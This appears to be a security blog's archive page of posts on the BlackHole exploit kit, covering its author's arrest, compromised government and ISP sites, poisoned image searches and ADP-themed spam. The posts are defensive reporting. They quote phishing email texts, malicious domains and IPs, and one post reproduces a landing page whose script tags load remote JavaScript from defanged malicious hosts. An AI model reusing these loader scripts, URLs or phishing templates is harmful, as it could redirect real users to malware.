Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label BlackHole Exploit. Show all posts
Security News
BlackHole Exploit Breaking News hacker news Hackers Arrested Security News

Paunch, creator of infamous BlackHole Exploit kit arrested in Russia


A man alleged to be the creator of infamous BlackHole exploit kit has been arrested by Russian authorities.

Maarten Boone, a security researcher at Fox-IT, was the first person who broke the news in his tweet saying " Blackhole exploit kit author 'Paunch' and his partners arrested in Russia".

However, there were no more information from Boone.  Jerome Segura at MalwareBytes pointed out that the encryption service used by Blackhole (crypt.am) is down.

Troels Oerting, head of the European Cybercrime Centre, an arm of Europol, has confirmed to TechWeekEurope an arrest had been made, the details of which were given to the organization.

“I know it is true, we got some information, but I cannot say anymore,” Oerting told TechWeek.
Read more »
Malware Report
BlackHole Exploit Government websites hacked Infected websites Malware Report

Taiwan Government sites infected and used in Wire Transfer spam mails



Be careful while visiting Taiwan Government websites , it may redirect you to BlackHole Exploit kit page.  We have discovered three infected Taiwan government websites. Initially , the infection identified by @Hulk_Crusader.

"h00p://www.tai**i.gov.tw/page-3.htm <- another Taiwan .gov site distributing malware. (Copies of Policies spam)" The tweet posted by the researcher reads. At EHN, i have discovered another infected government website.

The infected sites has the same URL pattern ('page-3.htm') and contains an iframe pointing to BlackHole Exploit page "podaruno**.ru".

malicious script

After quick Google search, i come to know that the infected websites are being used in a Wire Transfer Spam mail.

Good afternoon,

Your Wire Transfer Amount: USD 92,710.37
Transaction Report: View [Link_to_infected_page]
TEMIKA Heller,
The Federal Reserve Wire Network

The list of infected websites:

Read more »
Malware Report
blackhat seo poisoning BlackHole Exploit Breaking News Malware Report

Now Bing image search results leads to BHEK v2- Blackhat SEO poisoning


I reported a few days ago that Google Image search result leads to BlackHole Exploit kit v2.0 page. Now, Bing Image search results also leads to malicious sites.

A quick image search in Bing for the keyword 'movie outline example' results rogue images that leads to malicious websites. The attackers use BlackHat SEO to poison the search results.

Blackhat SEO, also known as malicious SEO poisoning, occurs when hackers manipulate search engine results to make their links appear higher than legitimate results. As a user searches for related terms, the infected links appear near the top of the search results, generating a greater number of clicks to malicious websites.

According to Sophos report, Bing search results are being poisoned more than other search engines(65%). 

"Digging further into the data, it is also clear that the attackers are getting most success from poisoning image search results." Researcher said.

When i clicked one of the rogue image, i was redirected to a malicious site "zaka.uni.**" that hosts the latest version of BlackHole Exploit kit(v2.0).

'zaka' , the same keyword is used in the malicious domain used in Google Image result attack. It seems like same group is poisoning Bing search result also.
Read more »
Featured
BlackHole Exploit Featured

Google Image search result leads to BlackHole Exploit kit v2.0



How many of you are using the Google image search for searching your favorite picture?! Beware while searching for "Shield" image.  I have come across a new malware/infected page.

Today, I was searching for the "Shield Sword" in Google image search.  I got the above image in the result. It is my favorite image.  In fact, I've used this for creating my facebook cover image.

I have clicked the picture in order to get the full size.  I was waiting for loading image, but instead, i was landed in a page that displays "Please wait page is loading". Damn, i have seen this text everyday since i started my career as Malware analyst.  Yes, it is BlackHole Exploit Kit landing page.

Unfortunately, i am browsing from Host machine. I have disabled the Java plug-in but failed to update the other softwares.  So , my system got infected.

Once again, i have analyzed the compromised page from my Virtual Machine. The infected page "hxxp://madebybrian.com/scripts/sword-and-shield-cartoon" that contains the following script :



The script redirects to the above site which hosts the latest version of BlackHole Exploit kit v2.0.


The page is still there in the Search Result. If you a normal user try to see the picture, what will happen?! It is hard to realize they are in malware page if their anti virus failed to detect the malware.

Guess what?! The above site is not listed in Blacklisting websites. I have report about this page to google, hope they will remove it soon.


Update 1:
The infected page now redirects o another malicious page "***.turndial.com".

Update  2:
Today, the site redirects to another Malicious page that also hosts the BlackHole Exploit v2.0. Still there is no warning from google and no one else care about that?!

Read more »
Spam Report
BlackHole Exploit Spam Report

ADP spam mail leads to BlackHole Exploit kit v2.0

blackhole exploit

The news about the BlackHole Exploit kit v2.0 release spreads like a wildfire in the Internet. It seems like Cyber Criminals started to use the new version for infecting users.

A security researcher have come across a spam mail purporting to be an ADP invoice reminder which leads to BlackHole Exploit kit v2.0 landing page.

The Spam mail intercepted by Researcher:
Subject: ADP Invoice Reminder

Your latest ADP Dealer Services Invoice is now available to view or pay online at ADP Online Invoice Management .

To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management account.

Total amount due by September 13, 2012

$17202.04

If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.

Questions about your bill?

Contact David Nieto by Secure Mail.

Note: This is an automated email. Please do not reply.

After clicking the link provided in the mail, recipient will be redirected to the malicious page through multiple sites. At the end of redirection, the victim will be ended in this page "46.249.*.122/links/systems-links_warns.php".

It seems like the landing page of BlackHole Exploit version 2.0. In previous version of BH, you will see "main.php?page=[random_number]" at the end of url.  But the latest version use combination of meaningful words.

Once again , i like to remind the Dynamic URL feature of the BH 2.0. The generated link targets only one users which is valid for a few seconds. Yes, it is true, the above link generates 404 error at the time of researcher visit.

At the time of writing this article, the above IP is unavailable.

Today , i have analyzed three malicious IP address which uses the latest version of BlackHole Exploit.  only one IP displayed the exploits. After few seconds, that IP also start to generate 404 error page.
Read more »
Malware Report
BlackHole Exploit Featured Malware Report

Blackhole exploit kit v2.0 : Good news for Cyber Criminals,bad news for AV


Paunch, the developer of BlackHole Exploit kit , has announced the new version 2.0 of the BlackHole Exploit kit. The new version claimed to have more features that makes this kit best in the market.

As far as we know, BlakHole is the most successful exploit kit which includes a collection of exploits to take advantage of vulnerability in the victim's machine to download malwares. There are plenty of other kits but BH is number one in the market because of its tremendous features.
The developer claimed that AV companies detects the old version very quickly. So in order to make their customers, they have rewritten the code of this exploit kit from scratch.

The latest version generates a dynamic URL, which is valid for a few seconds. So malware analyst can't analyze the malware page even though victims give URL details. It also protect the malware files from being downloaded multiple times.

 "JAR and PDF exploits show only for detected vulnerable versions of plug-ins if the plug is not vulnerable,exploits not issued, and not get in detection loop." The developer ad translated by Malware don't need coffee.

" In version 1. * link to malicious payload unfortunately was recognizable for AV companies and reversers, she looked this kind,. /Main.php?Varname=lgjlrewgjlrwbnvl2. The new version of the link to the malicious payload you can choose yourself, here are some examples: /news/index.php,/contacts.php and so on, now for the moment no one AV can not catch. And by default stream names when creating the flow created automatically from the dictionary with the actual words and not a random letters."

There is no change in the price.

The new features sounds great for Cyber Criminals but not for Malware analyst.
Read more »
Spam Report
BlackHole Exploit Spam Report

ADP Notification mail leads to BlackHole Exploit Kit

Researchers at MX Lab, started to intercept a spam mail campaign that masquerade as ADP Notification mail.The mail intercepted by researchers has subjects like "ADP Funding Notification " and "ADP Security Management Update".

The email is send from the spoofed addresses ADPClientServices@adp.com, ADPClientServices@adp.com, the email address may vary.

One of the intercepted spam mail content:
Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
Once user clicks the link provided in the spam mail, he will be taken to a website which has the following script:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://cyberku.co.cc/s8XVniQE/js.js”></script>
<script type=”text/javascript” src=”hxxp://maccvision.com/vS5qA1sz/js.js”></script>
</html>
Both javascript contains same script that will redirects you to' hxxp://216.119.142.129/view.php?s=7058dba9af062ccf'.  The URL hosts BlackHole Exploit Kit which use the plugin version 0.7.8 (the latest version BlackHole Exploit kit).



BlackHole Exploit kit tries to take advantage of the vulnerability reside in the victim system. After successful exploitation, it downloads a malicious file called 'info.exe'.  The detection ratio of this malware is 2/42 (VirusTotal).
Read more »
Malware Report
BlackHole Exploit Breaking News Malware Report

Japan Internet Service Provider, SpinNet contains malicious iframe



SpinNet, The leading Internet Service Provider in Japan, has been compromised and Executes malicious scripts, detected by Comodo's Site Inspector.

'home.att.ne.jp' contains iframe pointing to the malicious domain 'competechart.ru' which redirects to another sites.



Earlier today, 'hxxp://competechart.ru/in.cgi?16' redirects to malicious domain which hosts black Hole Exploit kit. At the time of writing, 'competechart.ru' redirects to bing.com.

UrlQuery detected competechart.ru url as SutraTDS , a Traffic Distribution Systems(TDS) package.  There are some other sites also infected by this iframe. A simple google search reveals the list of infected sites.

There are more malware domains that follows same method like competechart.ru, the list can be found at Sucuri Malware Labs .

Read more »
Subscribe to: Posts (Atom)